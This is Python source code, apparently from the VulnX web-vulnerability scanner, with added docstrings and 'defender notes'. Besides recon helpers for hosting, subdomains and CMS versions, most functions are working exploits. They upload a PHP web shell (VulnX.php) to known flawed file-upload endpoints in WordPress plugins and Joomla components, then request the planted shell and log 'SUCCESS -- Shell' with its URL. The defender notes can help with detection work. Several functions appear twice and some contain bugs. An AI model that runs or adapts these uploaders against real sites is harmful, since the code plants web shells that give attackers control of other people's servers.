def webhosting_info(hostinfo):
    """Print passive hosting details for the module-level target ``url``.

    Two third-party lookups are made through ``vxget``: a domain-age service
    and ipinfo.io for the resolved address. Only fields the regexes find are
    printed. ``hostinfo`` is accepted but never read in this body.

    NOTE(review): the page shows this function collapsed onto one line; only
    the "Domain Created on" print is placed under the ``if`` here -- confirm
    against the original layout.
    """
    print(' %s Web Hosting Information' % (run))
    age_lookup = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
    age_body = vxget(age_lookup, headers, timeout)
    created = re.search(re.compile(r'Date: (.+?)-(.+?)'), age_body)
    if created:
        print(' %s Domain Created on : %s' % (good, created.group(1)))

    # The label says "CloudFlare IP", but the value is simply whatever the
    # local resolver returns for the host.
    ip = socket.gethostbyname(hostd(url))
    print(' %s CloudFlare IP : %s' % (good, ip))

    geo_body = vxget("http://ipinfo.io/" + ip + "/json", headers, timeout)
    # (output format, pattern) pairs, searched and printed in the original order.
    fields = (
        (' %s Country : %s', r'country\": \"(.+?)\"'),
        (' %s Region : %s', r'region\": \"(.+?)\"'),
        (' %s Latitude : %s', r'latitude: (.+?)'),
        (' %s Longitude : %s', r'longitude\": \"(.+?)\"'),
        (' %s Timezone : %s', r'timezone\": \"(.+?)\"'),
        (' %s Ans : %s', r'ans\": \"(.+?)\"'),
        (' %s Org : %s', r'org\": \"(.+?)\"'),
    )
    hits = [(fmt, re.search(re.compile(pattern), geo_body)) for fmt, pattern in fields]
    for fmt, hit in hits:
        if hit:
            print(fmt % (good, hit.group(1)))
    print("-----------------------------------------------")
def joomla_comjdownloads2(url, headers, timeout):
    """Probe the jDownloads screenshots path and report on the response body.

    The caller's ``headers`` dict gets a fixed User-Agent before the name is
    rebound to a new dict. Two local files are opened and an upload form is
    assembled, but the form is never passed to any request in this body: the
    only call is a ``vxget`` of ``/images/jdownloads/screenshots/VulnX.php``.

    Defender note: the result is decided by the substring ``200`` appearing
    anywhere in the response text, so a reported hit is not evidence that a
    file exists on the site.
    """
    headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    probe_url = url + "/images/jdownloads/screenshots/VulnX.php"
    headers = {"content-type": ["form-data"]}
    # Opened but never closed or sent in this function.
    archive = open('./shell/VulnX.zip', 'rb')
    image = open('./shell/VulnX.gif', 'rb')
    form_fields = {
        'name': 'Tig',
        'mail': '*****@*****.**',
        'filetitle': 'Tig',
        'catlist': '1',
        'license': '0',
        'language': '0',
        'system': '0',
        'file_upload': archive,
        'pic_upload': image,
        'description': '<p>zot</p>',
        'senden': 'Send file',
        'option': 'com_jdownloads',
        'view': 'upload',
        'send': '1',
        '24c22896d6fe6977b731543b3e44c22f': '1'
    }
    body = vxget(probe_url, headers, timeout)
    if not re.findall(r'200', body):
        print(' %s Com Jdownloads2 %s' % (que, failexploit))
        return
    print(' %s Com Jdownloads2 %s %s' % (que, vulnexploit, probe_url))
def wp_wysija(url, headers, timeout, vulnresults):
    """Active upload check against the Wysija Newsletters theme-upload action.

    Passes the local file ``./shell/VulnX.php`` to ``vxpost`` for the
    ``wysija_campaigns`` admin-post URL, then requests the expected location
    under ``wp-content/uploads/wysija/themes`` and looks for ``Vuln X`` in
    the response. The outcome is printed and added to ``vulnresults``.

    Defender note: the POST to admin-post.php with ``action=themes`` followed
    by a GET for ``VulnX.php`` is the request pair this check issues; that
    file name under the uploads tree is the artefact to look for.
    """
    upload_url = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    payload = open('./shell/VulnX.php', 'rb')
    headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    form = {
        'theme': payload,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    }
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s Wysija Newsletters %s' % (que, failexploit))
        vulnresults.add('[FAILED] Wysija Newsletters')
        return
    print(' %s Wysija Newsletters %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + probe_url)
def wp_wysija(url, headers):
    """Two-argument variant of the Wysija Newsletters upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed (colour globals ``W``,
    ``G``, ``B``, ``R``) rather than recorded.

    Defender note: the traffic is a POST to admin-post.php with
    ``page=wysija_campaigns&action=themes`` and then a GET for
    ``VulnX.php`` under ``wp-content/uploads/wysija/themes``.
    """
    upload_url = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    payload = open('./shell/VulnX.php', 'rb')
    headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    form = {
        'theme': payload,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    }
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def joomla_foxcontact(url, headers, timeout):
    """Upload check labelled "Fox Contact".

    Despite the name, the request URL built here is the ``com_fabrik``
    ``ajax_upload`` endpoint; the com_foxcontact paths survive only in the
    commented-out block. The local file ``./shell/VulnX.txt`` is passed to
    ``vxpost``; afterwards ``/images/XAttacker.txt`` is appended to that same
    endpoint URL (not to ``url``) and fetched, and the body is searched for
    ``Tig``.

    Defender note: the caller's ``headers`` dict receives a fixed, dated
    User-Agent before the name is rebound, so later requests that reuse that
    dict carry the same string.
    """
    headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
    #         'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
    #         'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
    #         'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
    upload_url = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
    headers = {"content-type": ["form-data"]}
    payload = open('./shell/VulnX.txt', 'rb')
    form = {'file': payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = upload_url + "/images/XAttacker.txt"
    body = vxget(probe_url, headers, timeout)
    if not re.findall(r'Tig', body):
        print(' %s fox Contact %s' % (que, failexploit))
        return
    print(' %s Fox Contact %s %s' % (que, vulnexploit, probe_url))
def wp_showbiz(url, headers, timeout, vulnresults):
    """Active upload check against the Showbiz Pro ``update_plugin`` AJAX action.

    A User-Agent is picked at random from a fixed list of six strings and
    written into the caller's ``headers``. The local file
    ``./shell/VulnX.php`` is passed to ``vxpost`` for admin-ajax.php, then
    the expected extraction path is fetched and searched for ``Vuln X``.
    The outcome is printed and added to ``vulnresults``.

    NOTE(review): the follow-up ``vxget`` receives the form dict as its
    second argument and no timeout, unlike the other checks on this page.

    Defender note: the six User-Agent strings are static, so they can serve
    as a weak matching signal alongside the ``showbiz_ajax_action`` POST.
    """
    ajax_url = url + "/wp-admin/admin-ajax.php"

    def random_UserAgent():
        # Fixed pool; one entry is chosen per call.
        pool = [
            "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
        ]
        return random.choice(pool)

    headers['User-Agent'] = random_UserAgent()
    headers['Content_Type'] = 'multipart/form-data'
    form = {
        "action": "showbiz_ajax_action",
        "client_action": "update_plugin",
        "update_file": [open('./shell/VulnX.php', 'rb')]
    }
    vxpost(ajax_url, form, headers, timeout)
    probe_url = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
    body = vxget(probe_url, form)
    if not re.findall("Vuln X", body):
        print(' %s Showbiz Pro %s' % (que, failexploit))
        vulnresults.add('[FAILED] Showbiz Pro')
        return
    print(' %s Showbiz Pro %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + probe_url)
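def drupal_version():
    """Print the first ``Drupal <digits>`` string found on the target page.

    Reads the module-level ``url``, ``headers`` and ``timeout``, fetches the
    page through ``vxget`` and prints the first match using the colour
    globals ``G`` and ``W``. Nothing is printed when there is no match, and
    the function always returns ``None``.

    The pattern allows zero digits, so a bare "Drupal " also matches; treat
    the printed value as a banner string, not a verified version.
    """
    response = vxget(url, headers, timeout)
    # Raw string: the original non-raw literal relied on "\d" surviving as an
    # invalid escape, which newer interpreters warn about.
    pattern = re.compile(r'Drupal \d{0,10}')
    matches = pattern.findall(response)
    if matches and matches[0]:
        print('%s [+] Drupal Version : %s %s' % (G, matches[0], W))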
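def prestashop_version():
    """Print the first ``Prestashop <digits>`` string found on the target page.

    Reads the module-level ``url``, ``headers`` and ``timeout`` and fetches
    the page through ``vxget``. Nothing is printed when there is no match;
    the return value is always ``None``.

    NOTE(review): this body reads ``response.text`` while the other
    functions on the page hand the ``vxget`` result to ``re`` directly --
    confirm which return type ``vxget`` has in this version of the file.
    """
    response = vxget(url, headers, timeout)
    # Raw string avoids the invalid-escape warning the original literal
    # triggers for "\d"; the compiled pattern is unchanged.
    pattern = re.compile(r'Prestashop \d{0,9}')
    matches = pattern.findall(response.text)
    if matches and matches[0]:
        print('%s [+] Prestashop Version : %s %s' % (G, matches[0], W))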
def webhosting_info():
    """Print passive hosting details for the module-level target ``url``.

    Zero-argument variant: the timeout passed to ``vxget`` is fixed at 3 and
    only the country and region fields of the ipinfo.io response are shown.

    NOTE(review): the page shows this function collapsed onto one line; only
    the "Domain Created on" print is placed under the ``if`` here -- confirm
    against the original layout.
    """
    print('%s [~] Web Hosting Information %s' % (Y, W))
    age_lookup = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
    age_body = vxget(age_lookup, headers, 3)
    created = re.search(re.compile(r'Date: (.+?)-(.+?)'), age_body)
    if created:
        print('%s [*] Domain Created on : %s' % (B, created.group(1)))

    # Labelled "CloudFlare IP", but this is just the resolver's answer.
    ip = socket.gethostbyname(hostd(url))
    print('%s [*] CloudFlare IP : %s' % (B, ip))

    geo_body = vxget("http://ipinfo.io/" + ip + "/json", headers, 3)
    country_hit = re.search(re.compile(r'country\": \"(.+?)\"'), geo_body)
    region_hit = re.search(re.compile(r'region\": \"(.+?)\"'), geo_body)
    for fmt, hit in (('%s [*] Country : %s', country_hit),
                     ('%s [*] Region : %s', region_hit)):
        if hit:
            print(fmt % (B, hit.group(1)))
def wp_dm(url, headers, timeout, vulnresults):
    """Active upload check labelled "Download Manager".

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` for the
    site root ``url`` itself with a ``dm_upload`` field, then
    ``wp-content/plugins/downloads-manager/upload/VulnX.php`` is fetched and
    searched for ``Vuln X``. The outcome is printed and added to
    ``vulnresults``.

    Defender note: a multipart POST to the site root carrying ``upfile`` and
    ``dm_upload`` fields, followed by a GET for that plugin upload path, is
    the request pair this check issues.
    """
    # Annotation-only statement, kept as on the page: nothing is assigned.
    headers['Content_Type']: 'multipart/form-data'
    form = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    vxpost(url, form, headers, timeout)
    probe_url = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s Download Manager %s' % (que, failexploit))
        vulnresults.add('[FAILED] Download Manager')
        return
    print(' %s Download Manager %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] Download Manager -- Shell:' + probe_url)
def wp_dm(url, headers):
    """Two-argument variant of the "Download Manager" upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.

    Defender note: the traffic is a multipart POST to the site root with
    ``upfile`` and ``dm_upload`` fields, then a GET for ``VulnX.php`` under
    ``wp-content/plugins/downloads-manager/upload``.
    """
    # Annotation-only statement, kept as on the page: nothing is assigned.
    headers['Content_Type']: 'multipart/form-data'
    form = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    vxpost(url, form, headers, 3)
    probe_url = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] Download Manager %s --- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Download Manager %s---- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, probe_url, W))
def wp_cherry(url, headers, timeout, vulnresults):
    """Active upload check against the cherry-plugin import-export uploader.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` for
    ``admin/import-export/upload.php``; the sibling path ``VulnX.php`` is
    then fetched and searched for ``Vuln X``. The outcome is printed and
    added to ``vulnresults``.

    Defender note: both URLs sit under
    ``wp-content/plugins/cherry-plugin/admin/import-export/``, so a PHP file
    appearing in that directory is the artefact to look for.
    """
    # Annotation-only statement, kept as on the page: nothing is assigned.
    headers['Content_Type']: 'multipart/form-data'
    form = {'file': open('./shell/VulnX.php', 'rb')}
    upload_url = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s CherryFramework %s' % (que, failexploit))
        vulnresults.add('[FAILED] CherryFramework')
        return
    print(' %s CherryFramework %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + probe_url)
def wp_cherry(url, headers):
    """Two-argument variant of the cherry-plugin upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.

    Defender note: both URLs sit under
    ``wp-content/plugins/cherry-plugin/admin/import-export/``.
    """
    # Annotation-only statement, kept as on the page: nothing is assigned.
    headers['Content_Type']: 'multipart/form-data'
    form = {'file': open('./shell/VulnX.php', 'rb')}
    upload_url = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' % (B, W, probe_url, W))
def wp_adblockblocker(url,headers,timeout,vulnresults):
    """Active upload check against the ``getcountryuser`` AJAX action.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` in a
    ``popimg`` field, then ``wp-content/uploads/<year>/<month>/VulnX.php`` is
    fetched (``year`` and ``month`` are module-level names not defined in
    this body) and searched for ``Vuln X``. The outcome is printed and added
    to ``vulnresults``.

    Defender note: the probe path follows the dated uploads layout, so a PHP
    file inside a year/month media folder is the artefact to look for.
    """
    ajax_url = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    payload = open('./shell/VulnX.php','rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'popimg': payload}
    vxpost(ajax_url, form, headers, timeout)
    probe_url = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s adblockblocker %s' % (que, failexploit))
        vulnresults.add('[FAILED] adblockblocker')
        return
    print(' %s adblockblocker %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + probe_url)
def wp_adsmanager(url, headers, timeout, vulnresults):
    """Active upload check against Simple Ads Manager's ``sam-ajax-admin.php``.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` with
    ``action=upload_ad_image``; the plugin directory path for ``VulnX.php``
    is then fetched. Unlike the sibling checks, success is decided by the
    text ``{"status":"success"}`` appearing in that second response, not by
    the ``Vuln X`` marker. The outcome is printed and added to
    ``vulnresults``.

    Defender note: the handler is requested directly under
    ``wp-content/plugins/simple-ads-manager/``, so direct hits on that PHP
    file are the signal to watch.
    """
    upload_url = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'uploadfile': payload, 'action': 'upload_ad_image', 'path': ''}
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("{\"status\":\"success\"}", body):
        print(' %s Simple Ads Manager %s' % (que, failexploit))
        vulnresults.add('[FAILED] Simple Ads Manager')
        return
    print(' %s Simple Ads Manager %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + probe_url)
def wp_shop(url, headers, timeout, vulnresults):
    """Active upload check against WPshop's ``ajaxUpload`` handler.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` in a
    ``wpshop_file`` field, then ``wp-content/uploads/VulnX.php`` is fetched
    and searched for ``Vuln X``. The outcome is printed and added to
    ``vulnresults``.

    Defender note: the probe targets the top of the uploads directory, so a
    PHP file placed directly in ``wp-content/uploads`` is the artefact to
    look for.
    """
    upload_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {"wpshop_file": payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s WPshop eCommerce %s' % (que, failexploit))
        vulnresults.add('[FAILED] WPshop eCommerce')
        return
    print(' %s WPshop eCommerce %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + probe_url)
def wp_inboundiomarketing(url,headers,timeout,vulnresults):
    """Active upload check against InBoundio Marketing's ``csv_uploader.php``.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` in a
    ``file`` field, then ``admin/partials/uploaded_csv/VulnX.php`` is fetched
    and searched for ``Vuln X``. The outcome is printed and added to
    ``vulnresults``.

    Defender note: the upload handler and the ``uploaded_csv`` folder both
    sit inside the plugin directory, so a non-CSV file in that folder is the
    artefact to look for.
    """
    upload_url = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    payload = open('./shell/VulnX.php','rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'file': payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s InBoundio Marketing %s' % (que, failexploit))
        vulnresults.add('[FAILED] InBoundio Marketing')
        return
    print(' %s InBoundio Marketing %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + probe_url)
def wp_adblockblocker(url, headers):
    """Two-argument variant of the ``getcountryuser`` upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.
    ``year`` and ``month`` are module-level names not defined in this body.

    Defender note: the probe path follows the dated uploads layout
    (``wp-content/uploads/<year>/<month>/``).
    """
    ajax_url = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'popimg': payload}
    vxpost(ajax_url, form, headers, 3)
    probe_url = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def wp_shop(url, headers):
    """Two-argument variant of the WPshop ``ajaxUpload`` check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.

    Defender note: the probe targets ``wp-content/uploads/VulnX.php``, i.e.
    a PHP file placed directly in the uploads directory.
    """
    upload_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {"wpshop_file": payload}
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def wp_adsmanager(url, headers):
    """Two-argument variant of the Simple Ads Manager upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.
    Success is decided by ``{"status":"success"}`` appearing in the second
    response.

    Defender note: the handler is requested directly under
    ``wp-content/plugins/simple-ads-manager/``.
    """
    upload_url = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'uploadfile': payload, 'action': 'upload_ad_image', 'path': ''}
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    body = vxget(probe_url, headers, 3)
    if not re.findall("{\"status\":\"success\"}", body):
        print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def domain_info():
    """Print related domains and an IP scraped from a third-party search page.

    The module-level ``url`` is appended to a pagesinventory.com search URL
    and the returned HTML is mined with two regexes: one for ``/domain/``
    links and one for ``/ip/`` links. No request is sent to the target
    itself by this function.

    NOTE(review): the page shows this function collapsed onto one line; the
    "SubDomains" print is placed after the loop here -- confirm against the
    original layout.
    """
    print('%s [~] Search for SubDomains %s' % (Y, W))
    search_url = "https://www.pagesinventory.com/search/?s=" + url
    page = vxget(search_url, headers, 3)

    domain_hits = re.findall(
        re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'), page)
    ip_hits = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'), page)

    # Keep first-seen order while dropping repeats.
    unique = []
    for name in domain_hits:
        if name in unique:
            continue
        unique.append(name)
    print('%s [*] SubDomains : %s %s' %
          (B, " \n [*] SubDomains : ".join(unique), W))

    first_ip = ip_hits[0] if ip_hits else None
    if first_ip is not None and first_ip != "":
        print('%s [*] IP : %s %s' % (B, first_ip, W))
def joomla_comedia(url, headers, timeout):
    """Upload check against Joomla's ``com_media`` image view.

    The local file ``./shell/VulnX.txt`` is passed to ``vxpost`` in a
    ``Filedata[]`` field. Afterwards ``/images/XAttacker.txt`` is appended to
    that same endpoint URL (query string included, not to ``url``) and
    fetched, and the body is searched for ``Tig``.

    Defender note: the caller's ``headers`` dict receives a fixed, dated
    User-Agent before the name is rebound, so later requests that reuse that
    dict carry the same string.
    """
    headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    upload_url = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
    headers = {"content-type": ["form-data"]}
    payload = open('./shell/VulnX.txt', 'rb')
    form = {'Filedata[]': payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = upload_url + "/images/XAttacker.txt"
    body = vxget(probe_url, headers, timeout)
    if not re.findall(r'Tig', body):
        print(' %s Com Media %s' % (que, failexploit))
        return
    print(' %s Com Media %s %s' % (que, vulnexploit, probe_url))
def joomla_fabrik2_d(url, headers, timeout):
    """Upload check against the ``com_fabrik`` ``ajax_upload`` plugin method.

    The local file ``./shell/VulnX.txt`` is passed to ``vxpost`` in a
    ``file`` field. Afterwards ``/images/XAttacker.txt`` is appended to that
    same endpoint URL (query string included, not to ``url``) and fetched,
    and the body is searched for ``Tig``.

    Defender note: requests carrying
    ``option=com_fabrik&...&plugin=fileupload&method=ajax_upload`` are the
    signature of this check.
    """
    headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    upload_url = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
    headers = {"content-type": ["form-data"]}
    payload = open('./shell/VulnX.txt', 'rb')
    form = {'file': payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = upload_url + "/images/XAttacker.txt"
    body = vxget(probe_url, headers, timeout)
    if not re.findall(r'Tig', body):
        print(' %s Com Fabrik2 %s' % (que, failexploit))
        return
    print(' %s Com Fabrik2 %s %s' % (que, vulnexploit, probe_url))
def wp_inboundiomarketing(url, headers):
    """Two-argument variant of the InBoundio Marketing upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.

    Defender note: the upload handler and the ``uploaded_csv`` folder both
    sit inside the plugin directory.
    """
    upload_url = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {'file': payload}
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def domain_info(subdomains):
    """Print and record related domains scraped from a third-party search page.

    The module-level ``url`` is appended to a pagesinventory.com search URL
    and the returned HTML is mined for ``/domain/`` and ``/ip/`` links. Each
    new domain and the first IP are also added to ``subdomains`` with a
    ``domain : `` / ``ip : `` prefix. No request is sent to the target itself
    by this function.

    NOTE(review): the page shows this function collapsed onto one line; the
    nesting below is reconstructed -- confirm against the original layout.
    """
    print(' %s Search for SubDomains' % (run))
    search_url = "https://www.pagesinventory.com/search/?s=" + url
    page = vxget(search_url, headers, timeout)

    domain_hits = re.findall(re.compile(r'<td><a href=\"\/domain\/(.*?).html\">'), page)
    ip_hits = re.findall(re.compile(r'<a href=\"/ip\/(.*?).html\">'), page)

    unique = []
    if len(domain_hits) > 0:
        for name in domain_hits:
            if name in unique:
                continue
            unique.append(name)
            subdomains.add('domain : ' + name)
        print(' %s SubDomains : %s ' % (good, " \n ".join(unique)))

    first_ip = ip_hits[0] if ip_hits else None
    if first_ip is not None and first_ip != "":
        print(' %s IP : %s' % (good, first_ip))
        subdomains.add('ip : ' + first_ip)
    print("-----------------------------------------------")
def wp_synoptic(url, headers, timeout, vulnresults):
    """Active upload check against the Synoptic theme's avatar uploader.

    The local file ``./shell/VulnX.php`` is passed to ``vxpost`` in a
    ``qqfile`` field, then ``wp-content/uploads/markets/avatars/VulnX.php``
    is fetched and searched for ``Vuln X``. The outcome is printed and added
    to ``vulnresults``.

    Defender note: the handler lives under
    ``wp-content/themes/synoptic/lib/avatarupload/``; a PHP file in the
    avatars upload folder is the artefact to look for.
    """
    upload_url = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    payload = open('./shell/VulnX.php', 'rb')
